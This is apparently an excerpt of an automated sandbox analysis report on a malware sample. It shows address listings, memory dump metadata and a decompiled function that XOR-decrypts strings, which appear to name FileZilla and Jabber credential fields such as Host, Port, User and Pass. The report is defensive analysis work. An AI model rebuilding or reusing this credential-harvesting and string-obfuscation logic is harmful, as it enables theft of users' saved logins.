                                    0x0081c056
                                    0x0081c057
                                    0x0081c064
                                    0x0081c069
                                    0x0081c06f
                                    0x0081c075
                                    0x0081c07b
                                    0x0081c07b
                                    0x0081c057
                                    0x0081c083
                                    0x0081c094
                                    0x0081c094
                                    0x0081c0a2
                                    0x0081c0ae
                                    0x0081c0b5
                                    0x0081c0bf
                                    0x0081c0c4
                                    0x0081c0c6
                                    0x0081c0c9
                                    0x0081c0cd
                                    0x0081c0d2
                                    0x0081c0dc
                                    0x0081c0e5
                                    0x0081c0f2
                                    0x0081c0f9
                                    0x0081c0fe
                                    0x0081c105
                                    0x0081c106
                                    0x0081c108
                                    0x0081c118
                                    0x0081c119
                                    0x0081c11b
                                    0x0081c11c
                                    0x0081c121
                                    0x0081c128
                                    0x0081c12d
                                    0x0081c130
                                    0x0081c131
                                    0x0081c131
                                    0x0081c13b
                                    0x0081c14c
                                    0x0081c158
                                    0x0081c165
                                    0x0081c16f
                                    0x0081c17c
                                    0x0081c180
                                    0x0081c18b
                                    0x0081c196
                                    0x0081c1a1
                                    0x0081c1a6
                                    0x0081c1ac
                                    0x0081c1b1
                                    0x00000000
                                    0x0081c13d
                                    0x0081c13d
                                    0x0081c13f
                                    0x0081c13f
                                    0x0081c146
                                    0x0081c147
                                    0x0081c147
                                    0x00000000
                                    0x0081c13f
                                    0x0081c085
                                    0x0081c085
                                    0x0081c087
                                    0x0081c087
                                    0x0081c08e
                                    0x0081c08f
                                    0x00000000
                                    0x0081c087
                                    0x0081bff6
                                    0x0081bff6
                                    0x0081bff8
                                    0x0081bff8
                                    0x0081bfff
                                    0x0081c000
                                    0x00000000
                                    0x0081bff8
                                    0x0081bf21
                                    0x0081bf21
                                    0x0081bf23
                                    0x0081bf23
                                    0x0081bf2a
                                    0x0081bf2b
                                    0x0081bf2b
                                    0x00000000
                                    0x0081bf23
                                    0x0081be7a
                                    0x0081be7a
                                    0x0081be7c
                                    0x0081be7c
                                    0x0081be83
                                    0x0081be84
                                    0x00000000
                                    0x0081be7c
                                    0x0081bdeb
                                    0x0081bdeb
                                    0x0081bded
                                    0x0081bded
                                    0x0081bdf4
                                    0x0081bdf5
                                    0x00000000
                                    0x0081bded
                                    0x0081bd11
                                    0x0081bd11
                                    0x0081bd13
                                    0x0081bd13
                                    0x0081bd1a
                                    0x0081bd1b
                                    0x0081bd1b
                                    0x00000000
                                    0x0081bd13
                                    0x0081bc6a
                                    0x0081bc6a
                                    0x0081bc6c
                                    0x0081bc6c
                                    0x0081bc73
                                    0x0081bc74
                                    0x00000000
                                    0x0081bc6c
                                    0x0081bbdb
                                    0x0081bbdb
                                    0x0081bbdd
                                    0x0081bbdd
                                    0x0081bbe4
                                    0x0081bbe5
                                    0x00000000
                                    0x0081bbdd
                                    0x0081bb01
                                    0x0081bb01
                                    0x0081bb03
                                    0x0081bb03
                                    0x0081bb0a
                                    0x0081bb0b
                                    0x0081bb0b
                                    0x00000000
                                    0x0081bb03
                                    0x0081ba5a
                                    0x0081ba5a
                                    0x0081ba5c
                                    0x0081ba5c
                                    0x0081ba63
                                    0x0081ba64
                                    0x00000000
                                    0x0081ba5c
                                    0x0081b9cb
                                    0x0081b9cb
                                    0x0081b9cd
                                    0x0081b9cd
                                    0x0081b9d4
                                    0x0081b9d5
                                    0x00000000
                                    0x0081b9cd
                                    0x0081b9c9
                                    0x0081b8d9
                                    0x0081b77b
                                    0x0081b77b
                                    0x0081b77d
                                    0x0081b77d
                                    0x0081b784
                                    0x0081b785
                                    0x00000000
                                    0x0081b77d
                                    0x0081b6e5
                                    0x0081b6e5
                                    0x0081b6e7
                                    0x0081b6e7
                                    0x0081b6ee
                                    0x0081b6ef
                                    0x00000000
                                    0x0081b6e7

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                    • String ID: &$.$.$.$.$.$.$.$.$.$.$.$CB$LO]K$O@OI$fA]Z$hGBKtGBBOr${]K\$~A\Z$~O]]
                                    • API String ID: 1208101283-3398088302
                                    • Opcode ID: 0f3fbecea274a7a7d45743eae68ba9a6167d8b470fb78377cbb6a9dde1144e30
                                    • Instruction ID: 9171f5884024c8d4805936227fddb0921c865e10221f7e87bb55b11995484c0b
                                    • Opcode Fuzzy Hash: 0f3fbecea274a7a7d45743eae68ba9a6167d8b470fb78377cbb6a9dde1144e30
                                    • Instruction Fuzzy Hash: 1E820130904298DEDB25EB68E946BEDBBB4FF15310F2001A9E155F7292DB741EC5CB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00821BD6 Relevance: 24.5, Strings: 19, Instructions: 717COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00821BD6(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t234;
				void* _t237;
				char _t239;
				void* _t242;
				void* _t244;
				void* _t245;
				void* _t247;
				intOrPtr _t259;
				intOrPtr _t260;
				void* _t261;
				intOrPtr* _t262;
				char _t271;
				void* _t279;
				intOrPtr _t282;
				intOrPtr _t284;
				void* _t287;
				intOrPtr _t289;
				intOrPtr _t292;
				intOrPtr _t293;
				void* _t294;
				void* _t295;
				intOrPtr _t300;
				void* _t303;
				intOrPtr _t305;
				intOrPtr _t308;
				intOrPtr _t309;
				void* _t310;
				void* _t311;
				void* _t319;
				intOrPtr _t321;
				intOrPtr _t324;
				intOrPtr _t325;
				void* _t326;
				void* _t327;
				char _t332;
				char _t336;
				char _t340;
				char _t344;
				char _t348;
				char _t353;
				char _t357;
				char _t361;
				char _t365;
				char _t369;
				char _t374;
				char _t383;
				intOrPtr _t411;
				void* _t412;
				void* _t416;
				intOrPtr _t417;
				void* _t428;
				void* _t432;
				void* _t433;
				void* _t436;
				void* _t447;
				void* _t450;
				void* _t461;
				void* _t464;
				void* _t475;
				void* _t477;
				void* _t480;
				void* _t490;
				void* _t491;
				intOrPtr* _t504;
				void* _t506;
				intOrPtr _t508;
				intOrPtr* _t511;
				void* _t515;
				void* _t525;
				void* _t527;
				intOrPtr* _t528;
				intOrPtr _t530;
				void* _t531;
				intOrPtr* _t532;
				void* _t534;

				L00890CFC(0x892f82, __ebx, __ecx, __edx);
				_t528 = _t527 - 0x17c;
				asm("movaps xmm0, [0x8a9050]");
				_t234 =  *0x8b5758; // 0x8000002f
				_push(__ebx);
				_t511 =  *[fs:0x2c];
				_push(_t504);
				 *((intOrPtr*)(_t525 - 0x10)) = _t528;
				asm("movups [ebp-0x38], xmm0");
				 *((intOrPtr*)(_t525 - 0x28)) = 0x4356005d;
				 *((short*)(_t525 - 0x24)) = 0x2e42;
				if(_t234 >  *((intOrPtr*)( *_t511 + 4))) {
					_t504 = 0x8b5758;
					E0086DB91(_t234, 0x8b5758);
					_t536 =  *0x8b5758 - 0xffffffff;
					if( *0x8b5758 == 0xffffffff) {
						E0082D1A9(0x8b60d4, _t525 - 0x38);
						L0086DFE8(0x8b60d4, _t536, 0x895c95);
						L0086DB47(0x8b5758);
					}
				}
				if( *0x8b60e9 == 0) {
					L6:
					_push(0x8b60d4);
					E0082E8C7(0, _t525 - 0x128, 0x8b29cc, _t504);
					 *((intOrPtr*)(_t525 - 4)) = 0;
					 *((intOrPtr*)(_t525 - 0xd0)) = 0;
					 *((intOrPtr*)(_t525 - 0xcc)) = 0xf;
					 *((char*)(_t525 - 0xe0)) = 0;
					 *((intOrPtr*)(_t525 - 0x88)) = 0;
					 *((intOrPtr*)(_t525 - 0x84)) = 0xf;
					 *((char*)(_t525 - 0x98)) = 0;
					 *((char*)(_t525 - 4)) = 2;
					_t488 = _t525 - 0x128;
					 *((char*)(_t525 - 0x14)) = 0;
					_push( *((intOrPtr*)(_t525 - 0x14)));
					L0082FEC9(_t525 - 0x128);
					 *((char*)(_t525 - 4)) = 3;
					_t237 = E00813174(0, _t525 - 0x38, _t504);
					 *((char*)(_t525 - 4)) = 2;
					L0082DD77(_t525 - 0x38);
					if(_t237 == 0) {
						_t383 = 0;
						__eflags = 0;
						goto L77;
					} else {
						_t534 = _t528 - 0x18;
						_t428 = _t534;
						_t383 = 0;
						 *((intOrPtr*)(_t428 + 0x10)) = 0;
						 *((intOrPtr*)(_t428 + 0x14)) = 0;
						E0082E0AB(_t428, _t525 - 0x128);
						_t279 = E00818E25(0, _t525 - 0xc8, _t488);
						_t430 = _t525 - 0x98;
						_t528 = _t534 + 0x18;
						if(_t525 - 0x98 != _t279) {
							 *((char*)(_t525 - 0x14)) = 0;
							_push( *((intOrPtr*)(_t525 - 0x14)));
							E0082E143(_t430, _t279);
						}
						E0082DF41(_t525 - 0xc8);
						_t432 = _t525 - 0x98;
						if(E0082EA7D(_t432, 0x8a43ab, _t504, _t511) != 0) {
							L77:
							 *((char*)(_t525 - 4)) = 0xf;
							_t239 = E0082EA7D(_t525 - 0xe0, 0x8a43ab, _t504, _t511);
							__eflags = _t239;
							if(_t239 != 0) {
								L92:
								E0082DF41(_t525 - 0x98);
								E0082DF41(_t525 - 0xe0);
								_t242 = E0082DF41(_t525 - 0x128);
								 *[fs:0x0] =  *((intOrPtr*)(_t525 - 0xc));
								return _t242;
							}
							_t490 = 3;
							_t506 = L00818F5D(_t383, _t525 - 0x158, _t490);
							_t491 = 0x13;
							 *((char*)(_t525 - 4)) = 0x10;
							_t244 = L00818F5D(_t383, _t525 - 0x140, _t491);
							 *((char*)(_t525 - 4)) = 0x11;
							_t245 = E0082E8C7(_t383, _t525 - 0xf8, 0x8b2a8c, _t506);
							 *((char*)(_t525 - 4)) = 0x12;
							E0082FA3B(_t525 - 0xc8,  *((intOrPtr*)(_t525 - 0x14)), _t245, _t244, "\\");
							 *((char*)(_t525 - 4)) = 0x13;
							_t247 = E0082E917(_t525 - 0x110, _t525 - 0xc8, __eflags, ".");
							_push(_t506);
							_push(_t247);
							 *((char*)(_t525 - 4)) = 0x14;
							_push( *((intOrPtr*)(_t525 - 0x14)));
							E0082FA3B(_t525 - 0xb0);
							E0082DF41(_t525 - 0x110);
							E0082DF41(_t525 - 0xc8);
							E0082DF41(_t525 - 0xf8);
							E0082DF41(_t525 - 0x140);
							 *((char*)(_t525 - 4)) = 0x1a;
							E0082DF41(_t525 - 0x158);
							_t530 = _t528 - 0x18;
							_t411 = _t530;
							 *((intOrPtr*)(_t525 - 0x14)) = _t530;
							 *((intOrPtr*)(_t411 + 0x10)) = _t383;
							 *((intOrPtr*)(_t411 + 0x14)) = _t383;
							E0082E0AB(_t411, _t525 - 0xe0);
							_t531 = _t530 - 0x18;
							 *((char*)(_t525 - 4)) = 0x1b;
							_t412 = _t531;
							 *((intOrPtr*)(_t412 + 0x10)) = _t383;
							 *((intOrPtr*)(_t412 + 0x14)) = _t383;
							E0082E0AB(_t412, _t525 - 0xb0);
							 *((char*)(_t525 - 4)) = 0x1a;
							E00818DC6(_t525 - 0xc8);
							asm("movaps xmm0, [0x8a9160]");
							_t532 = _t531 + 0x30;
							__eflags =  *((intOrPtr*)(_t525 - 0x9c)) - 0x10;
							_t515 =  >=  ?  *((void*)(_t525 - 0xb0)) : _t525 - 0xb0;
							_t259 =  *0x8b5a60; // 0x0
							asm("movups [ebp-0x38], xmm0");
							 *((intOrPtr*)(_t525 - 0x28)) = 0x5a565a00;
							_t508 =  *((intOrPtr*)( *[fs:0x2c]));
							 *((char*)(_t525 - 0x24)) = 0x2e;
							__eflags = _t259 -  *((intOrPtr*)(_t508 + 4));
							if(_t259 >  *((intOrPtr*)(_t508 + 4))) {
								E0086DB91(_t259, 0x8b5a60);
								__eflags =  *0x8b5a60 - 0xffffffff;
								if( *0x8b5a60 == 0xffffffff) {
									E0082D54D(0x8b5214, _t525 - 0x38);
									L0086DFE8(0x8b5214, __eflags, 0x895be7);
									 *_t532 = 0x8b5a60;
									L0086DB47();
								}
							}
							__eflags =  *0x8b5228;
							if( *0x8b5228 == 0) {
								L84:
								_t260 =  *0x8b5d34; // 0x0
								 *((intOrPtr*)(_t525 - 0x20)) = 0x4c4c4f64;
								 *((intOrPtr*)(_t525 - 0x1c)) = 0x2e725c4b;
								__eflags = _t260 -  *((intOrPtr*)(_t508 + 4));
								if(_t260 >  *((intOrPtr*)(_t508 + 4))) {
									E0086DB91(_t260, 0x8b5d34);
									__eflags =  *0x8b5d34 - 0xffffffff;
									if(__eflags == 0) {
										_t216 = _t525 - 0x20; // 0x4c4c4f64
										_t217 = _t525 - 0x1c; // 0x2e725c4b
										 *0x8b5fb4 =  *_t216;
										 *0x8b5fb8 =  *_t217;
										L0086DFE8( *_t217, __eflags, 0x895bf7);
										L0086DB47(0x8b5d34);
									}
								}
								__eflags =  *0x8b5fbb;
								if( *0x8b5fbb == 0) {
									L89:
									_t261 = E0082E9EC(_t383, _t525 - 0x188, 0x8b5fb4);
									 *((char*)(_t525 - 4)) = 0x1c;
									_t262 = E0082E917(_t525 - 0x170, _t261, __eflags, 0x8b5214);
									_t416 = 0x8b2abc;
									 *((char*)(_t525 - 4)) = 0x1d;
									__eflags =  *((intOrPtr*)(_t262 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t262 + 0x14)) >= 0x10) {
										_t262 =  *_t262;
									}
									_push(_t416);
									_push(_t416);
									_t417 =  *0x8b4804; // 0x1346140
									E008183DF(_t417, _t262, _t515);
									E0082DF41(_t525 - 0x170);
									E0082DF41(_t525 - 0x188);
									 *0x8b488a = 1;
									E0082DF41(_t525 - 0xb0);
									goto L92;
								} else {
									do {
										 *(_t383 + 0x8b5fb4) =  *(_t383 + 0x8b5fb4) ^ 0x0000002e;
										_t383 = _t383 + 1;
										__eflags = _t383 - 8;
									} while (_t383 < 8);
									goto L89;
								}
							} else {
								_t271 = _t383;
								do {
									 *(_t271 + 0x8b5214) =  *(_t271 + 0x8b5214) ^ 0x0000002e;
									_t271 = _t271 + 1;
									__eflags = _t271 - 0x15;
								} while (_t271 < 0x15);
								goto L84;
							}
						} else {
							goto L10;
						}
						while(1) {
							L10:
							 *((char*)(_t525 - 4)) = 4;
							_t511 =  *_t511;
							_t282 =  *0x8b4f3c; // 0x0
							 *((intOrPtr*)(_t525 - 0x5c)) = 0x415c5e12;
							 *((intOrPtr*)(_t525 - 0x58)) = 0x414d415a;
							 *((short*)(_t525 - 0x54)) = 0x1042;
							 *((char*)(_t525 - 0x52)) = 0x2e;
							 *((intOrPtr*)(_t525 - 0x18)) = _t511;
							if(_t282 >  *((intOrPtr*)(_t511 + 4))) {
								E0086DB91(_t282, 0x8b4f3c);
								_t543 =  *0x8b4f3c - 0xffffffff;
								_pop(_t432);
								if( *0x8b4f3c == 0xffffffff) {
									_t504 = 0x8b5da0;
									asm("movsd");
									asm("movsd");
									asm("movsw");
									asm("movsb");
									L0086DFE8(_t432, _t543, 0x895c86);
									 *_t528 = 0x8b4f3c;
									L0086DB47();
									_t511 =  *((intOrPtr*)(_t525 - 0x18));
									_pop(_t432);
								}
							}
							if( *0x8b5daa == 0) {
								L16:
								_push(_t432);
								_t433 = _t525 - 0x98;
								if(E0082D960(_t433, 0x8b5da0) == 0xffffffff) {
									goto L77;
								}
								_t284 =  *0x8b5018; // 0x0
								 *((intOrPtr*)(_t525 - 0x68)) = 0x415c5e12;
								 *((intOrPtr*)(_t525 - 0x64)) = 0x414d415a;
								 *((short*)(_t525 - 0x60)) = 0x1042;
								 *((char*)(_t525 - 0x5e)) = 0x2e;
								if(_t284 >  *((intOrPtr*)(_t511 + 4))) {
									E0086DB91(_t284, 0x8b5018);
									_t548 =  *0x8b5018 - 0xffffffff;
									_pop(_t433);
									if( *0x8b5018 == 0xffffffff) {
										_t504 = 0x8b5fcc;
										asm("movsd");
										asm("movsd");
										asm("movsw");
										asm("movsb");
										L0086DFE8(_t433, _t548, 0x895c77);
										 *_t528 = 0x8b5018;
										L0086DB47();
										_t511 =  *((intOrPtr*)(_t525 - 0x18));
										_pop(_t433);
									}
								}
								if( *0x8b5fd6 == 0) {
									L23:
									_push(_t433);
									_t287 = L0082DFA2(_t525 - 0x98, _t383, E0082D960(_t525 - 0x98, 0x8b5fcc) + 0xa);
									_t436 = _t525 - 0x98;
									E0082DA01(_t436, _t287);
									_t289 =  *0x8b5318; // 0x0
									 *((intOrPtr*)(_t525 - 0xa4)) = 0x5c5e0112;
									 *((intOrPtr*)(_t525 - 0xa0)) = 0x4d415a41;
									 *((intOrPtr*)(_t525 - 0x9c)) = 0x2e104241;
									if(_t289 >  *((intOrPtr*)(_t511 + 4))) {
										E0086DB91(_t289, 0x8b5318);
										_t552 =  *0x8b5318 - 0xffffffff;
										_pop(_t436);
										if( *0x8b5318 == 0xffffffff) {
											_t504 = 0x8b5cc8;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											L0086DFE8(_t436, _t552, 0x895c5b);
											 *_t528 = 0x8b5318;
											L0086DB47();
											_t511 =  *((intOrPtr*)(_t525 - 0x18));
											_pop(_t436);
										}
									}
									if( *0x8b5cd3 == 0) {
										L29:
										_push(_t436);
										_push(E0082D960(_t525 - 0x98, 0x8b5cc8));
										_t292 = E0082D8D6(_t525 - 0x98, _t504, _t525 - 0x110, _t383);
										_t439 = _t292;
										 *((intOrPtr*)(_t525 - 0x14)) = _t292;
										 *((char*)(_t525 - 4)) = 5;
										_t293 =  *0x8b542c; // 0x0
										 *((intOrPtr*)(_t525 - 0x74)) = 0x5a415c7e;
										 *((intOrPtr*)(_t525 - 0x70)) = 0x42414d41;
										 *((short*)(_t525 - 0x6c)) = 0xe14;
										 *((char*)(_t525 - 0x6a)) = 0x2e;
										if(_t293 >  *((intOrPtr*)(_t511 + 4))) {
											E0086DB91(_t293, 0x8b542c);
											_t556 =  *0x8b542c - 0xffffffff;
											_pop(_t480);
											if( *0x8b542c == 0xffffffff) {
												_t504 = 0x8b4bb8;
												asm("movsd");
												asm("movsd");
												asm("movsw");
												asm("movsb");
												L0086DFE8(_t480, _t556, 0x895c68);
												 *_t528 = 0x8b542c;
												L0086DB47();
												_t511 =  *((intOrPtr*)(_t525 - 0x18));
											}
											_t439 =  *((intOrPtr*)(_t525 - 0x14));
										}
										if( *0x8b4bc2 == 0) {
											L36:
											_t294 = E0082EA3D(_t525 - 0xf8, 0x8b4bb8, _t439);
											 *((char*)(_t525 - 4)) = 6;
											_t295 = E0082E917(_t525 - 0xc8, _t294, _t558, "\n");
											 *((char*)(_t525 - 4)) = 7;
											E0082D9E5(_t295);
											E0082DF41(_t525 - 0xc8);
											E0082DF41(_t525 - 0xf8);
											_t447 = _t525 - 0x110;
											 *((char*)(_t525 - 4)) = 4;
											E0082DF41(_t447);
											_t300 =  *0x8b5ba8; // 0x0
											 *((intOrPtr*)(_t525 - 0x40)) = 0x434f4012;
											 *((short*)(_t525 - 0x3c)) = 0x104b;
											 *((char*)(_t525 - 0x3a)) = 0x2e;
											if(_t300 >  *((intOrPtr*)(_t511 + 4))) {
												E0086DB91(_t300, 0x8b5ba8);
												_t560 =  *0x8b5ba8 - 0xffffffff;
												_pop(_t447);
												if( *0x8b5ba8 == 0xffffffff) {
													_t504 = 0x8b5e20;
													asm("movsd");
													asm("movsw");
													asm("movsb");
													L0086DFE8(_t447, _t560, 0x895c4d);
													 *_t528 = 0x8b5ba8;
													L0086DB47();
													_t511 =  *((intOrPtr*)(_t525 - 0x18));
													_pop(_t447);
												}
											}
											if( *0x8b5e26 == 0) {
												L42:
												_push(_t447);
												_t303 = L0082DFA2(_t525 - 0x98, _t383, E0082D960(_t525 - 0x98, 0x8b5e20) + 6);
												_t450 = _t525 - 0x98;
												E0082DA01(_t450, _t303);
												_t305 =  *0x8b4ba4; // 0x0
												 *((intOrPtr*)(_t525 - 0x20)) = 0x4f400112;
												 *((intOrPtr*)(_t525 - 0x1c)) = 0x2e104b43;
												if(_t305 >  *((intOrPtr*)(_t511 + 4))) {
													E0086DB91(_t305, 0x8b4ba4);
													_t564 =  *0x8b4ba4 - 0xffffffff;
													_pop(_t450);
													if( *0x8b4ba4 == 0xffffffff) {
														 *0x8b4dac =  *((intOrPtr*)(_t525 - 0x20));
														 *0x8b4db0 =  *((intOrPtr*)(_t525 - 0x1c));
														L0086DFE8( *((intOrPtr*)(_t525 - 0x1c)), _t564, 0x895c30);
														 *_t528 = 0x8b4ba4;
														L0086DB47();
														_pop(_t450);
													}
												}
												if( *0x8b4db3 == 0) {
													L48:
													_push(_t450);
													_push(E0082D960(_t525 - 0x98, 0x8b4dac));
													_t308 = E0082D8D6(_t525 - 0x98, _t504, _t525 - 0xc8, _t383);
													_t453 = _t308;
													 *((intOrPtr*)(_t525 - 0x14)) = _t308;
													 *((char*)(_t525 - 4)) = 8;
													_t309 =  *0x8b4e9c; // 0x0
													 *((intOrPtr*)(_t525 - 0x48)) = 0x4b434f60;
													 *((short*)(_t525 - 0x44)) = 0xe14;
													 *((char*)(_t525 - 0x42)) = 0x2e;
													if(_t309 >  *((intOrPtr*)(_t511 + 4))) {
														E0086DB91(_t309, 0x8b4e9c);
														_t568 =  *0x8b4e9c - 0xffffffff;
														_pop(_t477);
														if( *0x8b4e9c == 0xffffffff) {
															_t504 = 0x8b51bc;
															asm("movsd");
															asm("movsw");
															asm("movsb");
															L0086DFE8(_t477, _t568, 0x895c3f);
															 *_t528 = 0x8b4e9c;
															L0086DB47();
															_t511 =  *((intOrPtr*)(_t525 - 0x18));
														}
														_t453 =  *((intOrPtr*)(_t525 - 0x14));
													}
													if( *0x8b51c2 == 0) {
														L55:
														_t310 = E0082EA3D(_t525 - 0xf8, 0x8b51bc, _t453);
														 *((char*)(_t525 - 4)) = 9;
														_t311 = E0082E917(_t525 - 0x110, _t310, _t570, "\n");
														 *((char*)(_t525 - 4)) = 0xa;
														E0082D9E5(_t311);
														E0082DF41(_t525 - 0x110);
														E0082DF41(_t525 - 0xf8);
														_t461 = _t525 - 0xc8;
														 *((char*)(_t525 - 4)) = 4;
														E0082DF41(_t461);
														_t316 =  *0x8b60c8;
														 *((intOrPtr*)(_t525 - 0x80)) = 0x5d4f5e12;
														 *((intOrPtr*)(_t525 - 0x7c)) = 0x5c41595d;
														 *((short*)(_t525 - 0x78)) = 0x104a;
														 *((char*)(_t525 - 0x76)) = 0x2e;
														if( *0x8b60c8 >  *((intOrPtr*)(_t511 + 4))) {
															E0086DB91(_t316, 0x8b60c8);
															_t572 =  *0x8b60c8 - 0xffffffff;
															_pop(_t461);
															if( *0x8b60c8 == 0xffffffff) {
																_t504 = 0x8b5a64;
																asm("movsd");
																asm("movsd");
																asm("movsw");
																asm("movsb");
																L0086DFE8(_t461, _t572, 0x895c21);
																 *_t528 = 0x8b60c8;
																L0086DB47();
																_t511 =  *((intOrPtr*)(_t525 - 0x18));
																_pop(_t461);
															}
														}
														if( *0x8b5a6e == 0) {
															L61:
															_push(_t461);
															_t319 = L0082DFA2(_t525 - 0x98, _t383, E0082D960(_t525 - 0x98, 0x8b5a64) + 0xa);
															_t464 = _t525 - 0x98;
															E0082DA01(_t464, _t319);
															_t321 =  *0x8b5324; // 0x0
															 *((intOrPtr*)(_t525 - 0x2c)) = 0x4f5e0112;
															 *((intOrPtr*)(_t525 - 0x28)) = 0x41595d5d;
															 *((intOrPtr*)(_t525 - 0x24)) = 0x2e104a5c;
															if(_t321 >  *((intOrPtr*)(_t511 + 4))) {
																E0086DB91(_t321, 0x8b5324);
																_t576 =  *0x8b5324 - 0xffffffff;
																_pop(_t464);
																if( *0x8b5324 == 0xffffffff) {
																	_t504 = 0x8b5bf8;
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	L0086DFE8(_t464, _t576, 0x895c06);
																	 *_t528 = 0x8b5324;
																	L0086DB47();
																	_t511 =  *((intOrPtr*)(_t525 - 0x18));
																	_pop(_t464);
																}
															}
															if( *0x8b5c03 == 0) {
																L67:
																_push(_t464);
																_push(E0082D960(_t525 - 0x98, 0x8b5bf8));
																_t324 = E0082D8D6(_t525 - 0x98, _t504, _t525 - 0xc8, _t383);
																_t467 = _t324;
																 *((intOrPtr*)(_t525 - 0x14)) = _t324;
																 *((char*)(_t525 - 4)) = 0xb;
																_t325 =  *0x8b5d3c; // 0x0
																 *((intOrPtr*)(_t525 - 0x50)) = 0x5d5d4f7e;
																 *((short*)(_t525 - 0x4c)) = 0xe14;
																 *((char*)(_t525 - 0x4a)) = 0x2e;
																if(_t325 >  *((intOrPtr*)(_t511 + 4))) {
																	E0086DB91(_t325, 0x8b5d3c);
																	_t580 =  *0x8b5d3c - 0xffffffff;
																	_pop(_t475);
																	if( *0x8b5d3c == 0xffffffff) {
																		_t504 = 0x8b51cc;
																		asm("movsd");
																		asm("movsw");
																		asm("movsb");
																		L0086DFE8(_t475, _t580, 0x895c13);
																		 *_t528 = 0x8b5d3c;
																		L0086DB47();
																	}
																	_t467 =  *((intOrPtr*)(_t525 - 0x14));
																}
																if( *0x8b51d2 == 0) {
																	L74:
																	_t326 = E0082EA3D(_t525 - 0xf8, 0x8b51cc, _t467);
																	 *((char*)(_t525 - 4)) = 0xc;
																	_t327 = E0082E917(_t525 - 0x110, _t326, _t582, "\n\n");
																	 *((char*)(_t525 - 4)) = 0xd;
																	E0082D9E5(_t327);
																	E0082DF41(_t525 - 0x110);
																	E0082DF41(_t525 - 0xf8);
																	_t432 = _t525 - 0xc8;
																	E0082DF41(_t432);
																	 *((intOrPtr*)(_t525 - 4)) = 2;
																	_t511 =  *[fs:0x2c];
																	continue;
																} else {
																	_t332 = _t383;
																	do {
																		 *(_t332 + 0x8b51cc) =  *(_t332 + 0x8b51cc) ^ 0x0000002e;
																		_t332 = _t332 + 1;
																		_t582 = _t332 - 7;
																	} while (_t332 < 7);
																	goto L74;
																}
															} else {
																_t336 = _t383;
																do {
																	 *(_t336 + 0x8b5bf8) =  *(_t336 + 0x8b5bf8) ^ 0x0000002e;
																	_t336 = _t336 + 1;
																} while (_t336 < 0xc);
																goto L67;
															}
														} else {
															_t340 = _t383;
															do {
																 *(_t340 + 0x8b5a64) =  *(_t340 + 0x8b5a64) ^ 0x0000002e;
																_t340 = _t340 + 1;
															} while (_t340 < 0xb);
															goto L61;
														}
													} else {
														_t344 = _t383;
														do {
															 *(_t344 + 0x8b51bc) =  *(_t344 + 0x8b51bc) ^ 0x0000002e;
															_t344 = _t344 + 1;
															_t570 = _t344 - 7;
														} while (_t344 < 7);
														goto L55;
													}
												} else {
													_t348 = _t383;
													do {
														 *(_t348 + 0x8b4dac) =  *(_t348 + 0x8b4dac) ^ 0x0000002e;
														_t348 = _t348 + 1;
													} while (_t348 < 8);
													goto L48;
												}
											} else {
												_t353 = _t383;
												do {
													 *(_t353 + 0x8b5e20) =  *(_t353 + 0x8b5e20) ^ 0x0000002e;
													_t353 = _t353 + 1;
												} while (_t353 < 7);
												goto L42;
											}
										} else {
											_t357 = _t383;
											do {
												 *(_t357 + 0x8b4bb8) =  *(_t357 + 0x8b4bb8) ^ 0x0000002e;
												_t357 = _t357 + 1;
												_t558 = _t357 - 0xb;
											} while (_t357 < 0xb);
											goto L36;
										}
									} else {
										_t361 = _t383;
										do {
											 *(_t361 + 0x8b5cc8) =  *(_t361 + 0x8b5cc8) ^ 0x0000002e;
											_t361 = _t361 + 1;
										} while (_t361 < 0xc);
										goto L29;
									}
								} else {
									_t365 = _t383;
									do {
										 *(_t365 + 0x8b5fcc) =  *(_t365 + 0x8b5fcc) ^ 0x0000002e;
										_t365 = _t365 + 1;
									} while (_t365 < 0xb);
									goto L23;
								}
							} else {
								_t369 = _t383;
								do {
									 *(_t369 + 0x8b5da0) =  *(_t369 + 0x8b5da0) ^ 0x0000002e;
									_t369 = _t369 + 1;
								} while (_t369 < 0xb);
								goto L16;
							}
						}
					}
				} else {
					_t374 = 0;
					do {
						 *(_t374 + 0x8b60d4) =  *(_t374 + 0x8b60d4) ^ 0x0000002e;
						_t374 = _t374 + 1;
					} while (_t374 < 0x16);
					goto L6;
				}
			}
















































































                                    0x00821bdb
                                    0x00821be0
                                    0x00821be6
                                    0x00821bed
                                    0x00821bf2
                                    0x00821bf4
                                    0x00821bfd
                                    0x00821bfe
                                    0x00821c01
                                    0x00821c07
                                    0x00821c0e
                                    0x00821c1a
                                    0x00821c1c
                                    0x00821c22
                                    0x00821c27
                                    0x00821c2f
                                    0x00821c3a
                                    0x00821c44
                                    0x00821c4a
                                    0x00821c50
                                    0x00821c2f
                                    0x00821c57
                                    0x00821c68
                                    0x00821c68
                                    0x00821c78
                                    0x00821c7d
                                    0x00821c80
                                    0x00821c86
                                    0x00821c90
                                    0x00821c96
                                    0x00821c9c
                                    0x00821ca6
                                    0x00821cac
                                    0x00821cb0
                                    0x00821cb6
                                    0x00821cbc
                                    0x00821cbf
                                    0x00821cc9
                                    0x00821ccd
                                    0x00821cd5
                                    0x00821cdb
                                    0x00821ce2
                                    0x00822446
                                    0x00822446
                                    0x00000000
                                    0x00821ce8
                                    0x00821ce8
                                    0x00821cf1
                                    0x00821cf3
                                    0x00821cf6
                                    0x00821cf9
                                    0x00821cfc
                                    0x00821d07
                                    0x00821d0c
                                    0x00821d12
                                    0x00821d17
                                    0x00821d19
                                    0x00821d1c
